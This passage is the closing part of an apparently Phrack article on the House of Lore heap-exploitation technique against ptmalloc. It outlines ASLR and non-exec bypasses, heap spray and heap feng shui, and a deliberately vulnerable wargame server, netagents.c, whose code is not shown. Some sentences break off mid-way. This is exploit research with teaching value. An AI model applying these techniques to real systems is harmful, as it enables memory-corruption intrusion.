               << Getting information off the Internet is
                  like taking a drink from a fire hydrant. >>

                                           [ Mitchell Kapor ]

---[ 5 ---[   Miscellany, ASLR and More   ]---

We already mentioned something about ASLR and Non Exec Heap in the Malloc
Des-Maleficarum paper. Now we do the same with the method we have studied.

For the purposes of this technique, I considered disabled the ASLR in all
examples of this article. If this protection was enabled in real life then
randomization only affects to the position of the final fake chunk in the
stack and our ability to predict a memory address close enough to a saved
return address that can be overwritten. This should not be an utterly 
impossible task, and we consider that the bruteforce is always a 
possibility that we will have a hand in most restrictive situations.

Obviously, the non-exec heap does not affect the techniques described in
this paper, as one might place a shellcode in any elsewhere, although we
warn that if the heap is not executable it is very likely that the stack 
will not be either. Therefore one should use a ret2libc style attack or 
return into mprotect( ) to avoid this protection.

This is an old theme, and each will know how to analyze problems underlying
the system attacked.

Unfortunately, I do not show a real-life exploit here. But we can talk a 
bit about the reliability and potential of success when we are studying a
vulnerability in the wild.

The preconditions are clear, this has been seen repeatedly throughout of
this article. The obvious difference between the PoC's that I presented 
here and the applications you use every day (as well as email clients, or
web browsers), is that one can not predict in a first chance the current 
state of the heap. And this is really a problem, because while this is not 
in a fairly stable and predictable state, the chances of exploiting will be

But very high-level hackers have already met once this class of problems,
and over time have been designing and developing a series of techniques
which allow reordering the heap so that both, the position of the allocated
chunks as the data contained within them, are parameters controlled by the
user. Among these techniques, we must appoint two best known:

   - Heap Spray
   - Heap Feng Shui

You can read something about them in the following paper presented at the
BlackHat 2007 [8]. In short we can say that the "Heap Spray" technique
simply fill in the heap as far as possible by requesting large amount of
memory placing there repetitions of nop sleds and the opportune shellcode,
then just simply find a predictable memory address for the "primitive 
4-byte overwrite". A very clever idea in this technique is to make the nop 
sled values equal to the selected address, so that it will be 

Feng Shui is a much more elaborate technique, it first tries to defragment 
the Heap by filling the holes. Then it comes back to create holes in the
upper controlled zone so that the memory remains as:

   [ chunk | hole | chunk | hole | chunk | hole | chunk ]

... and finally tries to create the buffer to overflow in one of these 
holes, knowing that this will always be adjacent to one of its buffers 
containing information controlled by the exploiter.

We will not talk about it more here. Just say that although some of these
methodologies may seem time consuming and fatigue making, without them
nobody could create reliable exploits, or obtain success in most of the

               << Programming today is a race between software
                  engineers striving to build bigger and better
                  idiot-proof programs, and the Universe trying
                  to produce bigger and better idiots. So far,
                  the Universe is winning. >>

                                                  [ Rich Cook ]

---[ 6 ---[   Conclusions   ]---

In this article we have seen how The House of Lore hid inside of itself a
power much greater than we imagined. We also presented a fun example 
showing that, despite not being vulnerable to all the techniques we knew so
far, it was still vulnerable to one that until now had only been described

We detail a second method of attack also based on the corruption of a 
largebin, this attack could be an alternative in some circumstances and 
should be as important as the main method of the smallbin  corruption.

Finally we detailed a way to apply THoL in version 3 of the Ptmalloc 
library, which many thought was not vulnerable to attacks due to the 
imposition of numerous restrictions.

Reviewing and analyzing in depth some of the security mechanisms that have
been implanted in this library, allowed to find that further studies will 
be needed to discover new vulnerabilities and areas of code that can be 
manipulated for personal fun and profit.

If you want a tip from mine on how to improve your hacking, here goes:

Reads everything, study everything... then forget it all and do it 
differently, do it better. Fill your cup, empty your cup and fill it again 
with fresh water.

Finally, I would like to recall that I said the following in my "Malloc
Des-Maleficarum" paper:

     "...and The House of Lore, although not very suitable for a
      credible case, no one can say that is a complete exception..."

With this new article I hope I have changed the meaning of my words, and
shown that sometimes in hacking you make mistakes, but never stop to 
investigate and repair your errors. Everything we do is for fun, and we 
will do it as long as we exist on the land and cyberspace.

               << All truths are easy to understand
                  once they are discovered;
                  the point is to discover them. >>

                                [ Galileo Galilei ]

---[ 7 ---[   Acknowledgments   ]---

First, I would like to give my acknowledgments to Dreg for his insistence 
for that I would do something with this paper and it not to fall into 
oblivion. After a bad time ... I could not give a talk on this subject at 
RootedCon [9], Dreg still graciously encouraged me to finish the 
translation and publish this article in this fantastic e-zine which 
undoubtedly left its mark etched in the hacking history. 

Indeed, the last details in the translation of this article are Dreg's 
work, and this would never have been what it is without his invaluable 

For the rest, also thanks to all the people I met in dsrCON!, all very 
friendly, outgoing and all with their particular point of madness. I am not
going to give more names, but, to all of them, thanks.

And remember...

Happy Hacking!

---[ 8 ---[   References   ]---

[1] Malloc Maleficarum

[2] Malloc Des-Maleficarum

[3] PTMALLOC (v2 & v3)

[4] Reducing the effective entropy of gs cookies

[5] Electric Fence - Red-Zone memory allocator

[6] Jemalloc - A Scalable Concurrent malloc(3) Implementacion for FreeBSD

[7] Guard Malloc (Enabling the Malloc Debugging Features)

[8] Heap Feng Shui in JavaScript - BlackHat Europe 2007

[9] Rooted CON: Congreso de Seguridad Informatica (18-20 Marzo 2010)

[10] dnmalloc 

[11] OpenBSD malloc

[12] Dnmaloc - A more secure memory allocator by Yves Younan, 
     Wouter Joosen, Frank Piessens and Hans Van den Eynden

[13] A new malloc(3) for OpenBSD by Otto Moerbeek

---[ 9 ---[   Wargame Code   ]---

In this last section we attach the same program "agents.c" that we saw
above but adapted to network environment so that it can be feasible to use 
in a servers exploitation wargame. At the same time the code is a bit more 
elaborate and robust.

As usual, "netagents.c" forks a child process (fork) for each connection 
made to it, and as each new process has its own heap, each attacker can 
confront the vulnerability based on zero. The actions of one not influence
to others.

The code should be adapted according to the needs of the manager conducting
or developing the wargame (as well as the number of allowed incoming 
connections or debugging information you want to give to the attacker if 
the game becomes very difficult).

The attached archive includes a makefile which assumes that in the same
directory as the source is the compiled library ptmalloc2 (libmalloc.a) to 
be linked with netagents.c. Each should adapt "malloc.c" to print the 
information it deems necessary, but the basics would be the changes that 
have been made throughout this article, which allows the attacker to know
from where they extract the chunks of memory requested.

How the attacker obtains the output of these changes? For simplicity,
"netagents.c" prevents calls to send( ) by closing the standard output 
(stdout) and duplicating it with the recent obtained client socket 
(dup(CustomerID)). We use the same trick as the shellcodes expected.

"netagents.c" also includes a new menu option, "Show Heap State", in order 
to see the state of the memory chunks that are being allocated or released 
during its execution, this allows you to see if the head of any free chunk 
has been overwritten. After some legal moves, a normal output would be 

 |    Allocated Chunk (0x8093004) | -> Agents[0]                                        
 |   SIZE      =    0x00000019    |                                                     

 |    Allocated Chunk (0x809301c) | -> Agents[1]
 |   SIZE      =    0x00000019    |             

 |    Allocated Chunk (0x8093034) | -> Agents[1]->name
 |   SIZE      =    0x00000029    |                   

 |      Free Chunk (0x8093058)    | -> Agents[1]->lastname
 |   PREV_SIZE  =   0x00000000    |                       
 |   SIZE       =   0x00000089    |                       
 |   FD         =   0x08050168    |                       
 |   BK         =   0x08050168    |

 |    Allocated Chunk (0x80930e4) | -> Agents[1]->desc
 |   SIZE      =    0x00000108    |

Following the example of the perl exploit presented in 2.2.2, one might 
design an exploit in C with a child process continually receiving responses
from the server (menus and prompts), and the father answering these 
questions with a pause, for example one second each answer (if you know 
what to respond to work that program ...). The difficult task is to predict
the addresses on the stack, which in the last phase of the attack, the last
reserved chunk should match the frame created by "edit_lastname( )" since 
that it is where we overwrite the saved return address and where the 
program probably will break (it is obvious that ASLR enabled suppose a new 
complexity to overcome).

What happens with failed attempts and segmentation failures? The program 
captures SIGSEGV and informs the attacker that something bad has happened 
and encourages him to connect again. The child process is the only that 
becomes unstable and thus a new connection leaves everything clean for a 
new attack.

The latest aid that one could provide to the attacker is to deliver the 
source code, so this could be adapted to study the vulnerability in local, 
and then carry his attack to the network environment.


begin-base64 644 thol.zip

--------[ EOF
[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2021, Phrack Magazine.